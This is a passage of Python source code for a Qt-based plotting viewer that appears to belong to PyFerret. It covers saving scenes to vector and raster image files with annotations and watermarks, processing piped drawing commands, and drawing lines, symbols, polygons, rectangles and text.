myannotations:\n annopicture = QPicture()\n annopainter = QPainter(annopicture)\n annotextdoc = QTextDocument()\n # Leave room for the added margins to the width\n annotextdoc.setTextWidth(self.__scenewidth - 2.0 * self.__addedannomargin)\n annotextdoc.setHtml(\"
<p>\" + \"<br />\".join(myannotations) + \"</p>
    \")\n annotextdoc.drawContents(annopainter)\n annopainter.end()\n annosize = annotextdoc.documentLayout().documentSize()\n else:\n annopicture = None\n annosize = None\n\n if (myformat == 'ps') or (myformat == 'eps') or (myformat == 'pdf'):\n # Setup the QPrinter that will be used to create the EPS, PS, or PDF file\n printer = QPrinter(QPrinter.HighResolution)\n printer.setOutputFileName(myfilename)\n # The print format is automatically set from the\n # filename extension; so the following is actually\n # only needed for absent or strange extensions\n if (myformat == 'ps') or (myformat == 'eps'):\n printer.setOutputFormat(QPrinter.PostScriptFormat)\n else:\n printer.setOutputFormat(QPrinter.PdfFormat)\n # Print to file in color\n printer.setColorMode(printer.Color)\n # get the width and height in inches of the image to be produced\n if vectsize:\n imagewidth = vectsize.width()\n imageheight = vectsize.height()\n else:\n imagewidth = self.__scenewidth * self.__scalefactor \\\n / float(self.physicalDpiX())\n imageheight = self.__sceneheight * self.__scalefactor \\\n / float(self.physicalDpiY())\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Set the image size\n try:\n # Set custom paper size to just fit around the image\n if (myformat != 'eps') and (imagewidth > imageheight):\n printer.setPaperSize(QSizeF(imageheight, imagewidth), QPrinter.Inch)\n else:\n printer.setPaperSize(QSizeF(imagewidth, imageheight), QPrinter.Inch)\n # The above has issues with Qt 4.6 at GFDL -\n # still puts it on the default letter size page.\n # So just always use a letter size page.\n # printer.setPaperSize(QPrinter.Letter)\n except AttributeError:\n # setPaperSize introduced in 4.4 and made setPageSize\n # obsolete; but RHEL5 Qt4 is 4.2, so set to letter size\n printer.setPageSize(QPrinter.Letter)\n # No margins (setPageMargins introduced in 4.4)\n printer.setFullPage(True)\n # Default orientation\n if (myformat != 'eps') and (imagewidth > imageheight):\n printer.setOrientation(QPrinter.Landscape)\n else:\n printer.setOrientation(QPrinter.Portrait)\n # also get the image size in units of printer dots\n printres = printer.resolution()\n printwidth = int(imagewidth * printres + 0.5)\n printheight = int(imageheight * printres + 0.5)\n # Set up to draw to the QPrinter\n painter = QPainter(printer)\n if not transparent:\n # Draw a rectangle filling the entire scene\n # with the last clearing color.\n # Only draw if not completely transparent\n if (self.__lastclearcolor.getRgb())[3] > 0:\n painter.fillRect(QRectF(0, 0, printwidth, printheight),\n self.__lastclearcolor)\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth * self.physicalDpiX() / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # factor that makes it work after scaling (12.5 = 1200 / 96)\n printfactor = printres / self.physicalDpiX()\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0 * printfactor, Qt.SolidLine, Qt.SquareCap, Qt.MiterJoin))\n painter.drawRect(QRectF(1.0 * printfactor, 1.0 * printfactor,\n (self.__scenewidth - 2.0) * printfactor,\n ((annosize.height() + 2.0 * 
self.__addedannomargin) - 2.0) * printfactor))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin * printfactor,\n self.__addedannomargin * printfactor),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0, 0.0,\n (annosize.height() + 2.0 * self.__addedannomargin) * printfactor,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n elif myformat == 'svg':\n generator = QSvgGenerator()\n generator.setFileName(myfilename)\n if vectsize:\n imagewidth = int(vectsize.width() * self.physicalDpiX() + 0.5)\n imageheight = int(vectsize.height() * self.physicalDpiY() + 0.5)\n else:\n imagewidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n imageheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Set the image size\n generator.setResolution(\n int(0.5 * (self.physicalDpiX() + self.physicalDpiY()) + 0.5) )\n generator.setSize( QSize(imagewidth, imageheight) )\n generator.setViewBox( QRect(0, 0, imagewidth, imageheight) )\n # paint the scene to this QSvgGenerator\n painter = QPainter(generator)\n if not transparent:\n # Draw a rectangle filling the entire scene\n # with the last clearing color.\n # Only draw if not completely transparent\n if (self.__lastclearcolor.getRgb())[3] > 0:\n painter.fillRect( QRectF(0, 0, imagewidth, imageheight),\n self.__lastclearcolor )\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin))\n painter.drawRect(QRectF(1.0, 1.0,\n self.__scenewidth - 2.0,\n annosize.height() + 2.0 * self.__addedannomargin - 2.0))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin,self.__addedannomargin),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0,\n 0.0, annosize.height() + 2.0 * self.__addedannomargin,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n 
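# Note: the opacity and scale set here remain in effect for all\n # subsequent drawing with this painter, so the watermark point\n # below is interpreted in the scaled coordinate system.\n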
painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n else:\n if rastsize:\n imagewidth = int(rastsize.width() + 0.5)\n imageheight = int(rastsize.height() + 0.5)\n else:\n imagewidth = int(self.__scenewidth * self.__scalefactor + 0.5)\n imageheight = int(self.__sceneheight * self.__scalefactor + 0.5)\n # Add in any height needed for the annotations\n if annopicture:\n annoheight = (annosize.height() + 2 * self.__addedannomargin) * \\\n imageheight / self.__sceneheight\n imageheight += annoheight\n # Create the image\n image = QImage( QSize(imagewidth, imageheight),\n QImage.Format_ARGB32_Premultiplied )\n # Indicate the recommended displayed size of PNG images\n image.setDotsPerMeterX(self.physicalDpiX() / 0.0254)\n image.setDotsPerMeterY(self.physicalDpiY() / 0.0254)\n # Initialize the image\n # Note that completely transparent gives black for formats not supporting\n # the alpha channel (JPEG) whereas ARGB32 with 0x00FFFFFF gives white\n if not transparent:\n # Clear the image with self.__lastclearcolor\n fillint = self.__helper.computeARGB32PreMultInt(self.__lastclearcolor)\n else:\n fillint = 0\n image.fill(fillint)\n # paint the scene to this QImage\n painter = QPainter(image)\n # Scaling printfactor for the scene to the saved image\n widthscalefactor = imagewidth / float(self.__scenewidth)\n # Check if there are annotations to add\n if annopicture:\n # Scale the scene now for the annotations\n painter.scale(widthscalefactor, widthscalefactor)\n # Draw a solid white rectangle with black outline for the annotations\n painter.setBrush(QBrush(Qt.white, Qt.SolidPattern))\n painter.setPen(QPen(QBrush(Qt.black, Qt.SolidPattern),\n 2.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin))\n painter.drawRect(QRectF(1.0, 1.0,\n self.__scenewidth - 2.0,\n annosize.height() + 2.0 * self.__addedannomargin - 2.0))\n # And add the annotations within this box\n painter.drawPicture(QPointF(self.__addedannomargin,self.__addedannomargin),\n annopicture)\n # Draw the scene to the printer - scaling already in effect\n self.paintScene(painter, 0,\n 0.0, annosize.height() + 2.0 * self.__addedannomargin,\n 1.0, \"Saving\", False)\n else:\n # No annotations so just do the normal drawing\n self.paintScene(painter, 0, 0.0, 0.0,\n widthscalefactor, \"Saving\", False)\n if (self.__wmarkFilename is not None):\n # Initialize watermark objects\n wmkpic = QPixmap(self.__wmarkFilename)\n wmkpt = QPointF()\n wmkpt.setX(self.__xloc)\n wmkpt.setY(self.__yloc)\n # set watermark image display opacity\n painter.setOpacity(self.__opacity)\n # set image scale\n painter.scale(self.__scalefrac, self.__scalefrac)\n # paint watermark image at specified location\n painter.setRenderHint(QPainter.Antialiasing)\n painter.drawPixmap(wmkpt, wmkpic)\n painter.end()\n # save the image to file\n if not image.save(myfilename, myformat):\n raise ValueError(\"Unable to save the plot as \" + myfilename)\n\n def checkCommandPipe(self):\n '''\n Get and perform commands waiting in the pipe.\n Stop when no more commands or if more than 50\n milliseconds have passed.\n '''\n try:\n if (sys.version_info[0] >= 3) and (sys.version_info[1] >= 3):\n starttime = time.process_time()\n else:\n starttime = time.clock()\n # Wait up to 2 milliseconds waiting for a command.\n # This prevents unchecked spinning when there is\n # nothing to do (Qt immediately calling this method\n # again only for this method to immediately 
return).\n while self.__cmndpipe.poll(0.002):\n cmnd = self.__cmndpipe.recv()\n self.processCommand(cmnd)\n # Continue to try to process commands until\n # more than 50 milliseconds have passed.\n # This reduces Qt overhead when there are lots\n # of commands waiting in the queue.\n if (sys.version_info[0] >= 3) and (sys.version_info[1] >= 3):\n elapsed = time.process_time() - starttime\n else:\n elapsed = time.clock() - starttime\n if elapsed > 0.050:\n break\n except EOFError:\n # Assume PyFerret has shut down\n self.exitViewer()\n except Exception:\n # Some problem, but presumably still functional\n (exctype, excval) = sys.exc_info()[:2]\n try:\n if excval:\n self.__rspdpipe.send(\"**ERROR %s: %s\" % (str(exctype), str(excval)))\n else:\n self.__rspdpipe.send(\"**ERROR %s\" % str(exctype))\n except Exception:\n pass\n\n def processCommand(self, cmnd):\n '''\n Examine the action of cmnd and call the appropriate\n method to deal with this command. Raises a ValueError\n if the \"action\" key is missing.\n '''\n try:\n cmndact = cmnd[\"action\"]\n except KeyError:\n raise ValueError(\"Unknown command '%s'\" % str(cmnd))\n\n if cmndact == \"clear\":\n try:\n bkgcolor = self.__helper.getColorFromCmnd(cmnd)\n except KeyError:\n bkgcolor = None\n self.clearScene(bkgcolor)\n elif cmndact == \"exit\":\n self.exitViewer()\n elif cmndact == \"hide\":\n self.showMinimized()\n elif cmndact == \"screenInfo\":\n scrnrect = QApplication.desktop().availableGeometry()\n info = ( self.physicalDpiX(), self.physicalDpiY(),\n scrnrect.width(), scrnrect.height() )\n self.__rspdpipe.send(info)\n elif cmndact == \"antialias\":\n self.__antialias = bool(cmnd.get(\"antialias\", True))\n elif cmndact == \"update\":\n self.updateScene()\n elif cmndact == \"redraw\":\n try:\n bkgcolor = self.__helper.getColorFromCmnd(cmnd)\n except KeyError:\n bkgcolor = None\n self.redrawScene(bkgcolor)\n elif cmndact == \"rescale\":\n newscale = float(cmnd[\"factor\"])\n self.scaleScene(newscale, True)\n elif cmndact == \"resize\":\n mysize = self.__helper.getSizeFromCmnd(cmnd)\n self.resizeScene(mysize.width(), mysize.height())\n elif cmndact == \"save\":\n filename = cmnd[\"filename\"]\n fileformat = cmnd.get(\"fileformat\", None)\n transparent = cmnd.get(\"transparent\", False)\n vectsize = self.__helper.getSizeFromCmnd(cmnd[\"vectsize\"])\n rastsize = self.__helper.getSizeFromCmnd(cmnd[\"rastsize\"])\n try:\n myannotations = cmnd[\"annotations\"]\n except KeyError:\n myannotations = None\n self.saveSceneToFile(filename, fileformat, transparent,\n vectsize, rastsize, myannotations)\n elif cmndact == \"setWidthFactor\":\n newfactor = float(cmnd.get(\"factor\", -1.0))\n if newfactor <= 0.0:\n raise ValueError(\"Invalid width factor\")\n self.setWidthScalingFactor(newfactor)\n elif cmndact == \"setTitle\":\n self.setWindowTitle(cmnd[\"title\"])\n elif cmndact == \"imgname\":\n value = cmnd.get(\"name\", None)\n if value:\n self.__lastfilename = value\n value = cmnd.get(\"format\", None)\n if value:\n self.__lastformat = value.lower()\n elif cmndact == \"show\":\n if not self.isVisible():\n self.show()\n elif cmndact == \"noalpha\":\n self.__noalpha = True\n elif cmndact == \"beginView\":\n self.beginView(cmnd)\n elif cmndact == \"clipView\":\n self.clipView(cmnd)\n elif cmndact == \"endView\":\n self.endView(True)\n elif cmndact == \"beginSegment\":\n self.beginSegment(cmnd[\"segid\"])\n elif cmndact == \"endSegment\":\n self.endSegment(True)\n elif cmndact == \"deleteSegment\":\n self.deleteSegment(cmnd[\"segid\"])\n elif cmndact 
== \"createSymbol\":\n # Define this symbol in self.__symbolpaths\n sympath = self.__helper.getSymbolFromCmnd(cmnd)\n # The name is now all that is needed to use this symbol\n self.__rspdpipe.send(cmnd['name'])\n elif cmndact == \"drawMultiline\":\n self.drawMultiline(cmnd)\n elif cmndact == \"drawPoints\":\n self.drawPoints(cmnd)\n elif cmndact == \"drawPolygon\":\n self.drawPolygon(cmnd)\n elif cmndact == \"drawRectangle\":\n self.drawRectangle(cmnd)\n elif cmndact == \"textSize\":\n info = self.getSimpleTextSize(cmnd)\n self.__rspdpipe.send(info)\n elif cmndact == \"drawText\":\n self.drawSimpleText(cmnd)\n elif cmndact == \"setWaterMark\":\n # self.setWaterMark(cmnd)\n self.setWaterMark(cmnd['filename'], None, cmnd['xloc'], cmnd['yloc'], cmnd['scalefrac'], cmnd['opacity'])\n else:\n raise ValueError(\"Unknown command action %s\" % str(cmndact))\n\n def beginView(self, cmnd):\n '''\n Setup a new viewport and window for drawing on a portion\n (possibly all) of the scene. Recognized keys from cmnd\n are:\n \"viewfracs\": a dictionary of sides positions (see\n CmndHelperPQ.getSidesFromCmnd) giving the\n fractions [0.0, 1.0] of the way through the\n scene for the sides of the new View.\n \"clip\": clip to the new View? (default: True)\n\n Note that the view fraction values are based on (0,0) being the\n top left corner and (1,1) being the bottom right corner. Thus,\n left < right and top < bottom.\n\n Raises a KeyError if the \"viewfracs\" key is not given.\n '''\n # Get the view rectangle in fractions of the full scene\n fracsides = self.__helper.getSidesFromCmnd(cmnd[\"viewfracs\"])\n # Should graphics be clipped to this view?\n try:\n clipit = cmnd[\"clip\"]\n except KeyError:\n clipit = True\n self.beginViewFromSides(fracsides, clipit)\n\n def beginViewFromSides(self, fracsides, clipit):\n '''\n Setup a new viewport and window for drawing on a portion\n (possibly all) of the scene. The view in fractions of\n the full scene are given in fracsides. Sets the clipping\n rectangle to this view. 
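For example, the test code at the end of this module creates a\n view covering the lower-left quadrant of the scene using the\n command (beginView converts the \"viewfracs\" value into the\n fracsides given here):\n { \"action\":\"beginView\",\n \"viewfracs\":{\"left\":0.0, \"right\":0.5,\n \"top\":0.5, \"bottom\":1.0},\n \"clip\":True }\n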
If clipit is True, graphics\n will be clipped to this view.\n '''\n # If a view is still active, automatically end it\n if self.__activepainter:\n self.endView(True)\n # Get the location for the new view in terms of scene pixels.\n width = float(self.__scenewidth)\n height = float(self.__sceneheight)\n leftpixel = fracsides.left() * width\n rightpixel = fracsides.right() * width\n bottompixel = fracsides.bottom() * height\n toppixel = fracsides.top() * height\n # perform the checks after turning into units of pixels\n # to make sure the values are significantly different\n if (0.0 > leftpixel) or (leftpixel >= rightpixel) or (rightpixel > width):\n raise ValueError(\"Invalid left, right view fractions: \" \\\n \"left in pixels = %s, right in pixels = %s\" \\\n % (str(leftpixel), str(rightpixel)) )\n if (0.0 > toppixel) or (toppixel >= bottompixel) or (bottompixel > height):\n raise ValueError(\"Invalid bottom, top view fractions: \" \\\n \"top in pixels = %s, bottom in pixels = %s\" \\\n % (str(toppixel), str(bottompixel)) )\n # Create the view rectangle in device coordinates\n vrectf = QRectF(leftpixel, toppixel,\n rightpixel - leftpixel, bottompixel - toppixel)\n # Create the new picture and painter\n self.__activepicture = QPicture()\n self.__activepainter = QPainter(self.__activepicture)\n # Set the clip rectangle to that of the view; this also activates clipping\n self.__activepainter.setClipRect(vrectf, Qt.ReplaceClip)\n # Disable clipping if not desired at this time\n if not clipit:\n self.__activepainter.setClipping(False)\n # Note that __activepainter has to end before __activepicture will\n # draw anything. So no need to add it to __viewpics until then.\n self.__drawcount = 0\n # Save the current view sides and clipit setting for recreating the view.\n # Just save the original objects (assume calling functions do not keep them)\n self.__fracsides = fracsides\n self.__clipit = clipit\n\n def clipView(self, cmnd):\n '''\n If cmnd[\"clip\"] is True, activates clipping to the\n current view rectangle. If cmnd[\"clip\"] is False,\n disable clipping in this view.\n\n Raises a KeyError if the \"clip\" key is not given.\n '''\n if cmnd[\"clip\"]:\n self.__activepainter.setClipping(True)\n self.__clipit = True\n else:\n self.__activepainter.setClipping(False)\n self.__clipit = False\n\n def endView(self, update):\n '''\n Ends the current view and appends it to the list of pictures\n drawn in the scene. If update is True, the displayed scene\n is updated.\n '''\n self.__activepainter.end()\n self.__activepainter = None\n # Only save the active picture if it contains something\n if self.__drawcount > 0:\n self.__viewpics.append((self.__activepicture, self.__segid))\n self.__drawcount = 0\n if update:\n # update the scene\n self.drawLastPictures(False)\n self.__activepicture = None\n\n def beginSegment(self, segid):\n '''\n Associates a segment ID with the current empty view\n (picture) and all future views until endSegment is\n called. If the current view is not empty, the current\n view is ended and a new view started. 
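The test code at the end of this module tags a group of drawText\n commands and later deletes them with the command sequence:\n { \"action\":\"beginSegment\", \"segid\":\"text\" }\n (several drawText commands)\n { \"action\":\"endSegment\" }\n { \"action\":\"deleteSegment\", \"segid\":\"text\" }\n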
If there is no\n active view, the segment ID is just saved for the\n next active view.\n '''\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(True)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n self.__segid = segid\n\n def endSegment(self, update):\n '''\n Ends the current active view and starts a new view.\n Removes the current segment ID associated with views.\n '''\n if self.__activepainter and (self.__drawcount > 0):\n self.endView(update)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n if update:\n self.drawLastPictures(False)\n self.__segid = None\n\n def deleteSegment(self, segid):\n '''\n Removes all pictures associated with the given segment ID\n '''\n # if deleting the current segment, end the current segment\n if segid == self.__segid:\n self.endSegment(False)\n # Go through all the pictures, determining which to save\n newpicts = [ ]\n for (viewpic, vsegid) in self.__viewpics:\n if vsegid != segid:\n newpicts.append((viewpic, vsegid))\n else:\n # picture was deleted, so will need to\n # regenerate the scene from the beginning\n self.__clearpixmap = True\n self.__lastpicdrawn = 0\n self.__viewpics[:] = newpicts\n # Do NOT update since there may be more segments to be deleted\n # Rely on receiving an update or redraw command at the end\n\n def updateScene(self):\n '''\n Updates the displayed graphics to include all drawn elements.\n '''\n # If there is an active picture containing something,\n # end the view, thus adding and displaying this picture,\n # then restart the view.\n if self.__drawcount > 0:\n self.endView(True)\n self.beginViewFromSides(self.__fracsides, self.__clipit)\n self.drawLastPictures(False)\n\n def drawMultiline(self, cmnd):\n '''\n Draws a collection of connected line segments.\n\n Recognized keys from cmnd:\n \"points\": consecutive endpoints of the connected line\n segments as a list of (x, y) coordinates\n \"pen\": dictionary describing the pen used to draw the\n segments (see CmndHelperPQ.getPenFromCmnd)\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises:\n KeyError if the \"points\" or \"pen\" key is not given\n ValueError if there are fewer than two endpoints given\n '''\n ptcoords = cmnd[\"points\"]\n if len(ptcoords) < 2:\n raise ValueError(\"fewer than two endpoints given\")\n endpts = QPolygonF( [ QPointF(xypair[0], xypair[1]) \\\n for xypair in ptcoords ] )\n mypen = self.__helper.getPenFromCmnd(cmnd[\"pen\"])\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n self.__activepainter.setBrush(Qt.NoBrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawPolyline(endpts)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def drawPoints(self, cmnd):\n '''\n Draws a collection of discrete points using a single symbol\n for each point.\n\n Recognized keys from cmnd:\n \"points\": point centers as a list of (x,y) coordinates\n \"symbol\": symbol to use (see CmndHelperPQ.getSymbolFromCmnd)\n \"size\": size of the symbol in points (1/72 inches) before\n scaling by the width scaling factor\n \"color\": color name or 24-bit RGB integer value (e.g., 0xFF0088)\n \"alpha\": alpha value from 0 (transparent) to 255 (opaque)\n \"highlight\": dictionary of \"color\" and \"alpha\" (as above)\n for filled symbol outline color; not outlined if omitted\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a KeyError if the 
\"symbol\", \"points\", or \"size\" key\n is not given.\n '''\n ptcoords = cmnd[\"points\"]\n ptsize = cmnd[\"size\"]\n try:\n highlight = self.__helper.getColorFromCmnd(cmnd[\"highlight\"])\n except KeyError:\n highlight = None\n sympath = self.__helper.getSymbolFromCmnd(cmnd[\"symbol\"])\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n try:\n mycolor = self.__helper.getColorFromCmnd(cmnd)\n mybrush = QBrush(mycolor, Qt.SolidPattern)\n except KeyError:\n mybrush = QBrush(Qt.SolidPattern)\n if sympath.isFilled():\n self.__activepainter.setBrush(mybrush)\n if highlight:\n # highlighted filled plot - pen width is 4% of the width of the symbol\n mybrush = QBrush(highlight, Qt.SolidPattern)\n mypen = QPen(mybrush, 4.0, Qt.SolidLine, Qt.FlatCap, Qt.MiterJoin)\n self.__activepainter.setPen(mypen)\n else:\n # filled plot without highlight - no pen, only brush\n self.__activepainter.setPen(Qt.NoPen)\n else:\n # stroked path - no brush, pen width is 8% of the width of the symbol, highlight is ignored\n self.__activepainter.setBrush(Qt.NoBrush)\n mypen = QPen(mybrush, 8.0, Qt.SolidLine, Qt.FlatCap, Qt.MiterJoin)\n self.__activepainter.setPen(mypen)\n # typical symbols are 100x100 pixels\n scalefactor = ptsize * self.widthScalingFactor() / 100.0\n if self.__maxsymbolwidth < 100.0 * scalefactor:\n self.__maxsymbolwidth = 100.0 * scalefactor\n if self.__maxsymbolheight < 100.0 * scalefactor:\n self.__maxsymbolheight = 100.0 * scalefactor\n for xyval in ptcoords:\n # save so the translation and scale are not permanent\n self.__activepainter.save()\n try:\n self.__activepainter.translate( QPointF(xyval[0], xyval[1]) )\n self.__activepainter.scale(scalefactor, scalefactor)\n self.__activepainter.drawPath(sympath.painterPath())\n finally:\n self.__activepainter.restore()\n self.__drawcount += len(ptcoords)\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def drawPolygon(self, cmnd):\n '''\n Draws a polygon item to the viewer.\n\n Recognized keys from cmnd:\n \"points\": the vertices of the polygon as a list of (x,y)\n coordinates\n \"fill\": dictionary describing the brush used to fill the\n polygon; see CmndHelperPQ.getBrushFromCmnd\n If not given, the polygon will not be filled.\n \"outline\": dictionary describing the pen used to outline\n the polygon; see CmndHelperPQ.getPenFromCmnd\n If not given, the border will be drawn with a\n cosmetic pen identical to the brush used to fill\n the polygon.\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a KeyError if the \"points\" key is not given.\n '''\n mypoints = cmnd[\"points\"]\n mypolygon = QPolygonF( [ QPointF(xypair[0], xypair[1]) \\\n for xypair in mypoints ] )\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n False)\n try:\n mybrush = self.__helper.getBrushFromCmnd(cmnd[\"fill\"])\n except KeyError:\n mybrush = Qt.NoBrush\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"outline\"])\n except KeyError:\n if ( mybrush == Qt.NoBrush ):\n raise ValueError('drawPolygon called without a Brush or Pen')\n # Use a \"cosmetic\" Pen matching the brush\n # mypen = QPen(mybrush, 0.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin)\n mypen = Qt.NoPen\n self.__activepainter.setBrush(mybrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawPolygon(mypolygon)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def 
drawRectangle(self, cmnd):\n '''\n Draws a rectangle in the current view using the information\n in the dictionary cmnd.\n\n Recognized keys from cmnd:\n \"left\": x-coordinate of left edge of the rectangle\n \"bottom\": y-coordinate of the bottom edge of the rectangle\n \"right\": x-coordinate of the right edge of the rectangle\n \"top\": y-coordinate of the top edge of the rectangle\n \"fill\": dictionary describing the brush used to fill the\n rectangle; see CmndHelperPQ.getBrushFromCmnd\n If not given, the rectangle will not be filled.\n \"outline\": dictionary describing the pen used to outline\n the rectangle; see CmndHelperPQ.getPenFromCmnd\n If not given, the border will be drawn with a\n cosmetic pen identical to the brush used to fill\n the rectangle.\n\n The coordinates are device coordinates from the upper left corner.\n\n Raises a ValueError if the width or height of the rectangle\n is not positive.\n '''\n # get the left, bottom, right, and top values\n # any keys not given get a zero value\n sides = self.__helper.getSidesFromCmnd(cmnd)\n width = sides.right() - sides.left()\n if width <= 0.0:\n raise ValueError(\"width of the rectangle (%s) is not positive\" % str(width))\n height = sides.bottom() - sides.top()\n if height <= 0.0:\n raise ValueError(\"height of the rectangle (%s) is not positive\" % str(height))\n myrect = QRectF(sides.left(), sides.top(), width, height)\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n False)\n try:\n mybrush = self.__helper.getBrushFromCmnd(cmnd[\"fill\"])\n except KeyError:\n mybrush = Qt.NoBrush\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"outline\"])\n except KeyError:\n if ( mybrush == Qt.NoBrush ):\n raise ValueError('drawRectangle called without a Brush or Pen')\n # Use a \"cosmetic\" Pen matching the brush\n # mypen = QPen(mybrush, 1.0, Qt.SolidLine, Qt.SquareCap, Qt.BevelJoin)\n mypen = Qt.NoPen\n self.__activepainter.setBrush(mybrush)\n self.__activepainter.setPen(mypen)\n self.__activepainter.drawRect(myrect)\n self.__drawcount += 1\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def getSimpleTextSize(self, cmnd):\n '''\n Returns the pair (width, height) for given text when drawn.\n Raises a KeyError if the \"text\" key is not given.\n\n The width value is the width for the text that can be used\n for positioning the next text item to draw. The height\n value is the ascent plus descent for the font and does not\n depend on the text. The bounding rectangle for the actual\n drawn text may exceed this (width, height) if, e.g., the text\n contains italic or unusual characters.\n\n Recognized keys from cmnd:\n \"text\": string to be displayed\n \"font\": dictionary describing the font to use; see\n CmndHelperPQ.getFontFromCmnd. 
If not given\n the default font for this viewer is used.\n '''\n try:\n myfont = self.__helper.getFontFromCmnd(cmnd[\"font\"])\n except KeyError:\n myfont = self.__activepainter.font()\n myfontmetrics = QFontMetricsF(myfont)\n mytext = cmnd[\"text\"]\n if PYTHONQT_VERSION == 'PyQt4':\n mytext = QString.fromUtf8(mytext)\n width = myfontmetrics.width(mytext)\n height = myfontmetrics.height()\n return (width, height)\n\n def drawSimpleText(self, cmnd):\n '''\n Draws a \"simple\" text item in the current view.\n Raises a KeyError if the \"text\" or \"location\" key is not given.\n\n Recognized keys from cmnd:\n \"text\": null-terminated UTF-8 encoded string to be displayed\n \"font\": dictionary describing the font to use; see\n CmndHelperPQ.getFontFromCmnd. If not given\n the default font for this viewer is used.\n \"fill\": dictionary describing the pen used to draw the\n text; see CmndHelperPQ.getPenFromCmnd.\n If not given, the default pen for this viewer\n is used.\n \"rotate\": clockwise rotation of the text in degrees\n \"location\": (x,y) location for the baseline of the\n start of text. The coordinates are device\n coordinates from the upper left corner.\n '''\n mytext = cmnd[\"text\"]\n startpt = cmnd[\"location\"]\n self.__activepainter.setRenderHint(QPainter.Antialiasing,\n self.__antialias)\n self.__activepainter.setBrush(Qt.NoBrush)\n try:\n mypen = self.__helper.getPenFromCmnd(cmnd[\"fill\"])\n self.__activepainter.setPen(mypen)\n except KeyError:\n pass\n # save so the font, translation, and rotation are not permanent\n self.__activepainter.save()\n try:\n try:\n myfont = self.__helper.getFontFromCmnd(cmnd[\"font\"])\n self.__activepainter.setFont(myfont)\n except KeyError:\n pass\n # Move the coordinate system so the origin is at the start\n # of the text so that rotation is about this point\n self.__activepainter.translate(startpt[0], startpt[1])\n try:\n rotdeg = cmnd[\"rotate\"]\n self.__activepainter.rotate(rotdeg)\n except KeyError:\n pass\n\n if PYTHONQT_VERSION == 'PyQt4':\n mytext = QString.fromUtf8(mytext)\n self.__activepainter.drawText(0, 0, mytext)\n self.__drawcount += 1\n finally:\n # return the painter to the default state\n self.__activepainter.restore()\n # Limit the number of drawing commands per picture\n if self.__drawcount >= self.__maxdraws:\n self.updateScene()\n\n def setWidthScalingFactor(self, factor):\n '''\n Assign the scaling factor for line widths and symbol sizes\n to convert from points (1/72 inches) to pixels, and to apply\n any additional width scaling specified by factor.\n '''\n self.__widthfactor = (self.physicalDpiX() + self.physicalDpiY()) / 144.0\n self.__widthfactor *= factor\n\n def widthScalingFactor(self):\n '''\n Return the scaling factor for 